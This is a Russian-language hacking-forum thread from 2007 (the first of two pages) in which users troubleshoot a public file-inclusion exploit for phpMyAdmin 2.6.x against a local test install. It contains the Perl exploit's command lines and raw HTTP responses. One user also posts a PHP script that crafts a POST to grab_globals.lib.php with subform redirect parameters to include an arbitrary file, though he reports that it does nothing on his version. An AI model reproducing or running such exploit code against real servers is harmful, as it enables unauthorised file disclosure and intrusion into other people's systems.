Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Error in simple exploit phpMyAdmin (https://forum.antichat.xyz/showthread.php?t=55595)

am@tory 12.12.2007 03:12
Error in simple exploit phpMyAdmin
 
Здрасте!
Вот тут наткнулся на phpMyAdmin 2.6.1
Нашел сплойтик, для него
_http://securityvulns.ru/Jdocument894.html
Заюзал на локалхосте, но походу ручки то кривые.
Пишет.

Цитата:
ATTACK HOST IS: http://localhost
HTTP/1.1 400 Bad Request
Date: Tue, 11 Dec 2007 22:56:29 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.4
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>
Запросы делал вида
C:\>perl\bin\perl.exe c:\php4.pl http://localhost /php/ www/htdocs/php/fuck.php

Предварительно создав fuck.php

Я наверно непрально пишу файл инклуда.
Подскажите как будет верно?

Piflit 12.12.2007 03:23
попробуй просто localhost . или для fuck.php может быть нужен параметр, в котором инклуд.

am@tory 12.12.2007 03:30
Цитата:
Сообщение от Piflit
попробуй просто localhost . или для fuck.php может быть нужен параметр, в котором инклуд.
ну если я прально понял, то просто localhost, не получится, а
Цитата:
fuck.php может быть нужен параметр, в котором инклуд
попробывал
C:\>perl\bin\perl.exe c:\php4.pl http://localhost /php/ www/htdocs/php/config.inc.php

тоже самое, наверно я непрально пишу путь к инклуду, пробывал
www/htdocs/php/config.inc.php
htdocs/php/config.inc.php
php/config.inc.php
config.inc.php
толка нет(

Scipio 12.12.2007 03:38
вобщем посмотрел я исходник, во первых убедись что phpmyadmin находится у тебя в папке php (не папка с phpmyadmin, а сам phpmyadmin)
во-вторых, имя файла который инклюдится (вернее там расчитано на то, что это читалка) должно иметь отнасительный путь, точно проверить не могу т.к. perl в денвере хреновый (без Sockets) сейчас попробую переделать под php если че отпишусь, если все получится

am@tory 12.12.2007 03:40
Цитата:
Сообщение от Scipio
вобщем посмотрел я исходник, во первых убедись что phpmyadmin находится у тебя в папке php (не папка с phpmyadmin, а сам phpmyadmin)
во-вторых, имя файла который инклюдится (вернее там расчитано на то, что это читалка) должно иметь отнасительный путь, точно проверить не могу т.к. perl в денвере хреновый (без Sockets) сейчас попробую переделать под php если че отпишусь, если все получится
Спасибо огромное! Буду ждать. Что в папке php я уверен)

http://localhost/php/index.php
C:\www\htdocs\php


Может у меня криво настроенный апач? Оо
и по каким-то причинам ему не нравится POST?

Piflit 12.12.2007 03:51
Цитата:
Сообщение от am@tory
Буду ждать. Что в папке php я уверен)
а в версии пхпмайадмина ты уверен?

am@tory 12.12.2007 03:54
Цитата:
Сообщение от Piflit
а в версии пхпмайадмина ты уверен?
Да)
readme
Version 2.6.1-pl2

При входе
Добро пожаловать в phpMyAdmin 2.6.1-pl2


CHANGELOG
Цитата:
----------------------
phpMyAdmin - Changelog
----------------------

$Id: ChangeLog,v 2.871.2.24 2005/02/24 19:08:57 lem9 Exp $
$Source: /cvsroot/phpmyadmin/phpMyAdmin/ChangeLog,v $

2005-02-24 Marc Delisle <lem9@users.sourceforge.net>
### 2.6.1-pl2 released

2005-02-24 Alexander M. Turek <me@derrabus.de>

Piflit 12.12.2007 03:55
может дырка есть и в более старых версиях, а может и нет, я не знаю. но там указан 2.6.4

am@tory 12.12.2007 04:03
Цитата:
Сообщение от Piflit
может дырка есть и в более старых версиях, а может и нет, я не знаю. но там указан 2.6.4
думаю, что да, например здесь
http://securityvulns.ru/source/PHPMYADMIN.html
версии 2.6 объединены

Scipio 12.12.2007 04:17
посмотрел я код grab_globals.lib.php нет там ничего, такого, что б могло позволять читать или инклюдить файлы (там вобще практически ничего нет)
вот код на пхп, помоему правильно:
PHP код:
<?php
$host="localhost";
$fl="../Credits";
$dira="/Tools/phpmyadmin/";
$filo="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$fl."&subform[1][cXIb8O3]=1";
$leng=strlen($filo);
$qv="POST ".$dira."libraries/grab_globals.lib.php HTTP/1.0\nHost:".$host."\nContent-Type:application/x-www-form-urlencoded\nContent-Length:".$leng."\n\n";
$qv=$qv.$filo;
$fp fsockopen ($host80);
fputs ($fp$qv);
while (!feof($fp))
          {
           echo fgets($fp);
          }

?>
$host - хост
$fl - файл для инклюда
$dira - папка с phpmyadmin

но этот сплоит у меня ничего не делает, т.к. еще раз говорю в grab_globals.lib.php ничего такого нет...

у меня phpMyAdmin 2.6.1


Время: 00:52
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице